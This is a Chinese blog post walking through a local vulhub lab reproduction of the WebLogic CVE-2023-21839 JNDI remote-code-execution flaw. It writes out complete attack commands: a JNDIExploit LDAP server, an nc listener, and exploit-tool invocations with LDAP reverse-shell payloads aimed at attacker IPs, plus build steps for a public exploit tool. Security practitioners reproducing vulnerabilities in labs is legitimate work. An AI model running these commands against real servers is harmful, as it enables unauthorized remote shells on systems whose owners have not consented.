CVE-2023-21839漏洞本地简单复现

简介: CVE-2023-21839漏洞本地简单复现

1. 说明


本文漏洞环境由vulhub下载后在本地部署:、


https://github.com/vulhub

本文漏洞利用工具1来源于:


https://github.com/DXask88MA/Weblogic-CVE-2023-21839(可能是我利用姿势不太对,没成功)

本文漏洞利用工具2来源于:


https://github.com/4ra1n/CVE-2023-21839

本文漏洞利用工具3来源于:


https://github.com/WhiteHSBG/JNDIExploit

我主要是对漏洞进行了本地的简单复现,其中用到的工具都是各位大神的,我对4ra1n大佬给的工具进行了编译。github源代码地址:

https://github.com/4ra1n/CVE-2023-21839

我自己编译之后的地址,请后台回复关键字 Weblogic 下载


2. 漏洞复现


2.1 漏洞原理


CVE-2023-21839允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup 操作,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,这可能会导致RCE漏洞。

以上来源于:

https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2023-21839/README.zh-cn.md


2.2 环境搭建


下载之后在本地使用docker部署:

docker-compose up -d

访问本地:http://127.0.0.1:7001/,出现以下界面证明环境搭建成功:

然后访问:http://127.0.0.1:7001/console/,等待几秒之后,即可访问到后台管理登录界面。

使用原来的Weblogic漏洞RCE神器进行测试,偶然发现存在cve-2016-3510


2.3 漏洞复现1-失败


攻击机kali192.168.135.22java11

目标机:10.30.0.214mac启动的dockerjava8

中转文件:JNDIExploit-1.4-SNAPSHOT.jar

kali上同时启动监听、命令执行、反弹shell的工作,先监听:

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 10.30.0.214

然后在本地开启监听:

nc -lvnp 7777

使用下面的工具进行测试:

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

命令(要记得使用java8的环境,不然会报错):

java -jar Weblogic-CVE-2023-21839.jar 10.30.0.214:7001 ldap://192.168.135.22:1389/Basic/ReverseShell/192.168.135.22/7777
[*]java -jar 目标ip:端口 ldap地址
java -jar Weblogic-CVE-2023-21839.jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111

通过多次测试,发现还是有问题,能执行但是回不来:

可能是我的姿势不太对。。。

因为时间关系,暂时就不测试了。


2.4 漏洞复现2-成功


攻击机kali192.168.135.22java11

目标机:10.30.0.214mac启动的dockerjava8

中转文件:JNDIExploit-1.4-SNAPSHOT.jar

首先在kali上设置监听,用于接收反弹的shell

再通过kali上来设置监听:

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.135.22

最后使用工具来进行攻击测试,使用工具来源于:

https://github.com/4ra1n/CVE-2023-21839

将工具下载下来之后,在有go的环境中编译一下:

cd cmd
go build -o CVE-2023-21839

使用的时候,按照作者的方法来执行:

./CVE-2023-21839 -ip 10.30.0.214 -port 7001 -ldap ldap://192.168.135.22:1389/Basic/ReverseShell/192.168.135.22/7777
10.30.0.214为靶机
192.168.22.105为攻击机,也是接收反弹shell的ip

漏洞复现之后,记得及时关闭环境:


2.5 windows下工具使用


以上工具编译之后,在这里使用windows版本的试下:

同样可以成功。

相关文章
|
安全 Java 测试技术
如何搭建 WebGoat 靶场保姆级教程(附链接)
如何搭建 WebGoat 靶场保姆级教程(附链接)
|
9月前
|
消息中间件 安全 Java
vulhub部分复现记录(后面大概都是原文档了,也比较难复现就不继续了)
本文介绍了多个软件的安全漏洞及其复现过程,涉及的软件包括Vulhub、Flask、ActiveMQ、Adminer、Airflow、Apache Druid、Apereo CAS、APISIX、AppWeb、Aria2、Bash、Cacti、Celery、CGI、ColdFusion和Confluence。每个部分详细描述了漏洞的背景、环境搭建步骤、漏洞复现的具体操作和验证方法。例如,Flask的SSTI漏洞通过构造特定的模板参数实现命令执行;ActiveMQ的反序列化漏洞利用特制的序列化对象触发;这些示例不仅展示了漏洞的危害性,还提供了实际的复现步骤,帮助读者深入理解这些安全问题。
1557 3
vulhub部分复现记录(后面大概都是原文档了,也比较难复现就不继续了)
|
应用服务中间件 PHP nginx
CVE-2019-11043 复现
CVE-2019-11043 复现
264 5
|
安全 关系型数据库 Linux
高危漏洞CVE-2024-38077的修复指南
根据2024年8月9日,国家信息安全漏洞共享平台(CNVD)收录了Windows远程桌面许可服务远程代码执行漏洞(CNVD-2024-34918,对应CVE-2024-38077)。未经身份认证的攻击者可利用漏洞远程执行代码,获取服务器控制权限。目前,该漏洞的部分技术原理和概念验证伪代码已公开,厂商已发布安全更新完成修复。CNVD建议受影响的单位和用户安全即刻升级到最新版本。
|
11月前
|
安全 Cloud Native Shell
云上攻防:云原生篇&Docker容器逃逸
本文介绍了Docker的基本概念及其对渗透测试的影响,重点讲解了容器逃逸的方法。Docker是一种轻量级的容器技术,与虚拟机相比,具有更高的便携性和资源利用率。然而,这也带来了安全风险,特别是容器逃逸问题。文章详细描述了三种常见的容器逃逸方法:不安全的配置、相关程序漏洞和内核漏洞,并提供了具体的检测和利用方法。此外,还介绍了几种特定的漏洞(如CVE-2019-5736和CVE-2020-15257)及其复现步骤,帮助读者更好地理解和应对这些安全威胁。
629 0
云上攻防:云原生篇&Docker容器逃逸
|
安全 Oracle 关系型数据库
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
|
网络协议 安全 Python
python实现对网络流量分析
Python提供多种工具进行网络流量分析,如`pcap`库用于实时捕包,`dpkt`库用于解码数据包,以及`Scapy`库进行高级分析。
766 1
|
安全 Linux Python
Volatility3内存取证工具安装及入门在Linux下的安装教程
Volatility3内存取证工具安装及入门在Linux下的安装教程
1578 0
Volatility3内存取证工具安装及入门在Linux下的安装教程
|
安全 Unix Linux
CVE-2021-4034 pkexec 本地提权复现
CVE-2021-4034 pkexec 本地提权复现
907 0
|
XML 安全 Oracle
干货 | 最全最详细的Weblogic漏洞总结(建议收藏)
干货 | 最全最详细的Weblogic漏洞总结(建议收藏)
7274 0